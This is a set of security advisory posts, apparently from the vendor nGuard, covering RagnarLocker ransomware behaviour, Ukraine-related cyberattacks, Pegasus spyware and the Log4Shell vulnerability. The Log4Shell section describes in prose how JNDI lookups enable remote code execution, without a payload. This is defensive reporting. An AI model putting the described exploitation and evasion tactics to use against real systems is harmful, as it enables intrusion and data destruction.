| Introduction It is no secret that critical infrastructure is on cyber watch here in the United States. On March 7th, the FBI issued a flash warning regarding a strain of ransomware called RagnarLocker. At least 52 organizations across 10 critical infrastructure sectors have been affected by this variant of ransomware since it was first detected by the FBI in 2020. The list includes government agencies, manufacturing companies, financial services firms, and information technology firms. Threat actors behind RagnarLocker ransomware usually collaborate together, modifying the methods they use to distribute the ransomware constantly. How It Works RagnarLocker ransomware is complex and operates in the following way: 1. It attempts to identify the physical location of the infected machine utilizing Windows API GetLocaleInfoW and terminates the encryption process if the victim location is identified as “Azerbaijani,” “Armenian,” “Belorussian,” “Kazakh,” “Kyrgyz,” “Moldavian,” “Tajik,” “Russian,” “Turkmen,” “Uzbek,” “Ukrainian,” or “Georgian.” 2. To prevent multiple encryptions and corrupted data, the tool checks for current infections. 3. In the following step, it identifies all attached hard drives and assigns a drive letter to any volume that has not yet been assigned a logical drive letter. They are then accessible and can be encrypted. 4. All services running on infected machines are examined, and any services used for remote administration are terminated. 5. It then attempts to delete all Volume Shadow Copies, which will further disrupt an organization’s ability to retrieve data from the infected computer. 6. Lastly, it encrypts all available files. Instead of choosing files and folders to encrypt, it picks which to not encrypt. In general, it excludes core Windows OS files to prevent the machine from malfunctioning during the encryption process. Many times hackers will utilize the increasingly popular “double extortion” tactic, in which the attacker first exfiltrates sensitive data, then triggers the encryption attack, threatening to leak the stolen data if the target refuses to pay the ransom. Indicators of Compromise The FBI Flash Warning, on page 3, lists a number of Indicators of Compromise (IOC) associated with RagnarLocker Ransomware. Below are some examples of these IOCs. Conclusion Keeping ransom payments away from these threat actors is always the FBI’s recommendation. They believe this emboldens attackers to pursue these techniques against other organizations. They also urge all ransomware attacks to be reported. This provides investigators and analysts with the critical information they need to track ransomware attackers and hopefully prevent future attacks. If your organization has fallen victim to a ransomware attack, nGuard can help. Our incident response team is readily available to assist your organization. Preventative measures such as penetration testing and strategic security assessments can help mitigate risk in the first place and hopefully prevent such types of attacks. |
Red Teaming
| Target: Water Utilities Water Utilities play a critical role in our society. They provide fresh, potable water to residents, businesses and industry as well as manage the wastewater from them. As with other utilities and critical infrastructure, they are increasingly a target for hackers, terrorists, and hostile nation states. A successful hack can contaminate the fresh water supply, impair availability or cause an environmental disaster. It’s a direct risk to the health of the local population and supply chains which depend on readily available fresh water and wastewater management. Becoming a Hard Target Managing the risks isn’t trivial, but it’s not rocket science either –the science of cyber security has greatly matured over the past 20 years. The following 5 steps are key to a water utility becoming a hard target that is resistant to cyberattacks. Assess your overall cyber security program. Test your organization’s current readiness to cyber attacks on an annual basis by assessing both your external perimeter and your internal networks. Make sure you include both the IT and the OT (SCADA) sides of the house. Perform ongoing vulnerability management throughout the year. Make sure you have someone watching for suspicious security events. Lastly, make sure you have a Cyber Security Incident Response (CSIR) program in place. Because a cyber security incident is a question of when, not if, you must have a plan in place before it happens. Strength In Numbers Recognizing the critical importance of the water supply, leading water associations in the U.S., along with the U.S. federal government, have become increasingly organized in the defense of this essential infrastructure. A key part of this organization has been the formation of the Water Information Sharing and Analysis Center (WaterISAC). Authorized by the United States’ 2002 Bioterrorism Act, the WaterISAC is the key security information source for all threats impacting water and wastewater systems. In support of their mission, they have developed the 15 Cybersecurity Fundamentals for Water & Wastewater Utilities. As part of their ongoing education and outreach, WaterISAC recently invited nGuard to speak about some of these key cybersecurity concepts at an association meeting. You can watch this webinar below. |
Russia has launched a full-scale military invasion into the country of Ukraine and with that comes the increased risk of cyber-attacks across the globe. Over the last couple weeks, we have seen many of these threats come to fruition as Ukrainian web sites were defaced and taken offline. New strains of data-destroying malware were also found to be deployed on critical government systems. Below are some of the most current cyber incidents that are taking place as a result of recent Russian aggression.
More than 70 Ukrainian government website have been defaced in cyberattacks (npr.org)
In a call conducted by Mary Louise Kelly, NPR’s cyber security correspondent Jenna McLaughlin detailed a series of cyber attacks that left about 70 Ukrainian government websites defaced. Hackers posted concerning messages in multiple languages telling viewers to be afraid and expect the worst. Jenna says these attacks are unsophisticated operations linked to a hacking group located in Russia and Belarus.
Ukrainian crisis: ‘Wiper’ discovered in latest cyber-attacks (bbc.com)
Late last week, BBC reported that while the websites of several Ukrainian banks and government offices became inaccessible, “wiper” malware was also being deployed on compromised systems. This malware aims to locate and destroy data residing on system drives. “ESET telemetry shows that the malware was installed on hundreds of machines in the country.”
Biden has been presented with options for massive cyberattacks against Russia (nbcnews.com)
Last Thursday, NBC News reported that President Biden had been presented with a menu of options for the United States to carry out impactful cyber attacks against Russia in a response to their recent military action against Ukraine. Two U.S. intelligence officials say that while no final decision has been made, all options remain on the table. “You could do everything from slow the trains down to have them fall off the tracks,” one person briefed on the matter said.
Russian ransomware gang threatens countries that punish Moscow for Ukraine invasion (politico.com)
Last Friday, Politico reported that a Russian ransomware gang, Conti, was making threats to hack the critical infrastructure of any nation or organization that retaliates against Russia for its recent military operations in Ukraine. The Conti gang issued its full support for the Russian government. This group is well known for launching government sponsored cyber attacks across the globe that have had devastating impacts.
Anonymous Hacking Group Declares “Cyber War” Against Russia (infosecurity-magazine.com)
The hacking group Anonymous has made it known that they will be launching a retaliatory cyber campaign against the Russian government following the special military operation launched by President Putin in Ukraine. Posted on their official Twitter account last Thursday read “The Anonymous collective is officially in cyber war against the Russian government. #Anonymous #Ukraine.” Shortly after this tweet was posted, the group claimed to have taken down multiple Russian government websites.
The United States government has issued strong warnings to organizations that reiterate the need to have a strong security posture during these times of uncertainty. nGuard account executives are ready to discuss any and all cyber security needs to help boost the readiness of your organization.
NSO Group continues to stay at the top of the headlines as 2022 carries on. There have been 3 noteworthy updates since the last nGuard Security Advisory, let’s look into each. If you haven’t seen the prior Security Advisories covering the NSO Group they can be found here, here, and a video summary here.
FBI discloses it tested the Pegasus spyware in 2019
Earlier this month, the FBI and the Justice Department confirmed they had tested Pegasus but stated it had not been deployed for use in any of their investigations. The FBI stated, “The FBI works diligently to stay abreast of emerging technologies and tradecraft — not just to explore a potential legal use but also to combat crime and to protect both the American people and our civil liberties,” the statement said. “That means we routinely identify, evaluate, and test technical solutions and problems for a variety of reasons, including possible operational and security concerns they might pose in the wrong hands. There was no operational use in support of any investigation, the FBI procured a limited license for product testing and evaluation only.” The NSO Group has since been blacklisted from the United States, however The New York Times reported the FBI ran up roughly $5 million in charges in its contract with the NSO Group prior to this occurring.
Although the NSO Group has stated they cannot deploy their software Pegasus against U.S. based phones with a +1 number, they have created another product called Phantom which allows the monitoring of those types of numbers. A company called Westbridge, NSO’s North American branch, was handing out this brochure to law enforcement for Phantom. It looks very similar to the one leaked for Pegasus when this story originally broke last year.
NYPD Received Demo of Pegasus
The NYPD intel group was in communication to receive a demo of the Pegasus software, as seen in the email below courtesy of Motherboard. This is a very similar brochure the FBI received from Westbridge.
The email came from James Sheehan who is a program manager for Northern New Jersey-Newark and Jersey City Urban Area Security Initiative, which is administered by the United States Department of Homeland Security (DHS). Others that were invited to attend the demonstration were Bergen County Prosecutor’s Office, Jersey City’s public safety agency, and the Paterson Police Department. The NYPD has not responded to these revelations, so it is still unknown if they took any steps to acquire the Pegasus software.
The Israeli Government Announced its Investigation into Domestic Use of Pegasus
As more and more eyes have focused on the NSO Group, Israel has announced they are investigating reports of the Israeli police illegally using Pegasus against its own citizens without a court order. One individual that has been reported to have been spied on is a witness in the trial of former Israeli Prime Minister Benjamin Netanyahu. Pegasus continues to draw negative attention and is being labeled as a “threat to democracy” with Aylet Shaked, a cabinet minister, saying, “I am shocked,” she added. “I cannot believe this is my country.”
The police in Israel have been using Pegasus since 2015 and deployed it on over 100 phones each year since. In a list recently revealed, it seems as if nobody was immune. The list includes protesters, Ministry CEOs, and journalists. It was also used to determine witness credibility. When the news about Pegasus initially broke last year we discovered Pegasus was used on all types of individuals throughout the world, but nobody knew it was used domestically in Israel against its own people.
Threats Are on The Rise
As tensions rise on the border separating Russia and its south-west neighbor Ukraine, threats of cyber attacks have the Western World on edge. There have been nearly 500 documented cyber-attacks impacting the geopolitical landscape around the globe since 2009, with approximately 30% originating from Russia or China. History shows us that Russia has found success in launching cyber attacks against nations it feels “threaten their long-term national security.” On January 23rd, 2022, the Department of Homeland Security (DHS) released a memo stating “Russia maintains a range of offensive cyber tools that it could employ against US networks—from low-level denials-of-service to destructive attacks targeting critical infrastructure.”
History of Conflict
Since the 2014 annexation of Crimea by the Russian Federation, cyberattacks have been a recurring militaristic theme in this conflict. In December 2015, Russian hackers exploited vulnerabilities in three Ukrainian energy distribution companies, disrupting the electricity supply for over 230,000 Ukrainians. The complex cyberattacks followed a similar exploit path that we see utilized by adversaries to this day. Social engineering campaigns were followed by the seizing of Supervisory Control And Data Acquisition (SCADA) systems, resulting in denial of service attacks on call centers, the destruction and encryption of critical file servers, and the disablement of OT infrastructure components.
Current Conflict
In 2022, it seems that the Kremlin is more than ready to use the same cyber tactics that led to the successful annexation of Crimea in 2014. On January 15th, 2022 Microsoft reported that dozens of Ukrainian government agencies had fallen victim to a website defacement attack. The message on the affected websites read “be afraid and expect the worst.”
Russia is suspected of using similar tactics to launch “false-flag” operations that are intended to stir up domestic tension in Ukraine and/or cast blame on Ukraine for the conflict. U.S. and international information security teams are ramping up preparations for any possible scenario as diplomatic negotiations continue.
Preventative Measures
The continued discovery of critical vulnerabilities that affect internet-facing systems (see Log4j) requires organizations to conduct ongoing vulnerability scanning and penetration testing to ensure attackers can’t gain a foothold on internal networks. By incorporating internal security awareness training and table-top exercises, standard employees and information security teams can be prepared for any scenario. As a leading provider of cyber security services, nGuard is ready to discuss your organization’s needs and help implement protective measures.
Overview
On December 10th, 2021, CVE-2021-44228 (Log4Shell) was released affecting the Log4j Java logging framework. This vulnerability received the highest possible CVSS score of 10 out of 10. There have been three other vulnerabilities released related to Log4j since then, but the original is the most critical by far. Initially discovered by Chen Zhaojun, who works for Alibaba’s security team, back on November 24th, 2021 which was the privately disclosed to Apache. The risk of this vulnerability is so severe, as a precautionary measure, Canada shut down 4,000 government sites. Since the public release there has been reports of millions of attempts to exploit the vulnerability across the world, but as of January 10th, CISA stated they have not seen any significant intrusions related to Log4j.
So, what is Log4j, what makes it so vulnerable, and how do you exploit it?
Log4j is a piece of software, which most surprisingly is developed and maintained by a group of volunteers, that was coded in Java and logs activity of users on computers. An example of activity that is captured and logged would be navigating to a nonworking link on a web page and receiving a 404 error. Log4j is also used for diagnostic messages in software such as amount of memory being used and user commands entered. The logging of this information isn’t the issue, it’s the fact that the code actively interprets the activity that it is logging, meaning that remote code can be executed. Within Log4j there is a feature called Java Naming Directory Interface (JNDI) that allows commands to be run that are wrapped in ${…}. This feature allows live lookups both inside and outside of your network. With this correct sequence of input, this feature can be used to place malware on the server and have full remote code execution on the host. An example input would reach out to an attacking machine IP on port 9999 and download the malware file that is being hosted.
Products affected
At this time, it’s almost safe to assume that all products are affected as Log4j has been discovered to be deeply embedded in so many pieces of software, even to some that were not aware of its existence. Popular products like Minecraft, Apple’s iCloud, AWS, the NSA’s reverse engineering tool Ghidra, and the list goes on. CISA continues to update their GitHub with a list of known products to be affected.
Detection & Patching
To discover what systems to patch, here are a few steps to take:
- Identify any internet facing assets.
- Use authenticated vulnerability scanning to detect devices that have been impacted.
- If you have an endpoint detection and response (EDR) system, you can use that to search for Log4j files.
- Determine the version of Log4j being used. Version 2.0 to 2.14.1 are the versions that are vulnerable.
- Update to the current version 2.17.1.
- Repeat the above steps on internal IT and OT systems.
To prevent Log4j from being exploited, there are a few steps to take.
- Search logs for IPs that have known to be scanning for the vulnerability and add them to your block list. A running list of known IPs can be found here.
- Block a list of IPs that have been used to host a malicious payload to execute the vulnerability.
- Review the list of IOCs being updated by Microsoft.
- Review the additional list of IOCs being updated by the Curated Intelligence Trust Group.
Additional links
There have been many articles and resources that have been published since the release of this vulnerability, so in addition to the links in this Security Advisory, nGuard wanted to provide a few additional for further reading.
- If you want to try and exploit the vulnerability yourself, John Hammond and TryHackMe have created a room for you to do so. https://tryhackme.com/room/solar
- A Growing List of Tenable Nessus Plugins being release for detection of Log4j. https://community.tenable.com/s/article/Plugins-associated-with-CVE-2021-44228-Log4Shell
- The team at Huntress has had great coverage and updates, including an open-source tool to help detect the vulnerability. https://log4shell.huntress.com/
- The National Cyber Security Centrum (NCSC-NL) has been maintaining another GitHub repository with a list of information for hunting, IOCs, detection and mitigation, scanning, and vulnerable software. https://github.com/NCSC-NL/log4shell
- CISA Released an open-source Log4j Scanner. https://github.com/cisagov/log4j-scanner
If you feel you need assistance with the detection of vulnerable Log4j instances, have discovered a Log4j related incident, or need general security services related to this vulnerability or anything else, reach out to nGuard. nGuard offers Log4j scanning, consulting services, log management and event collection, and penetration testing services.
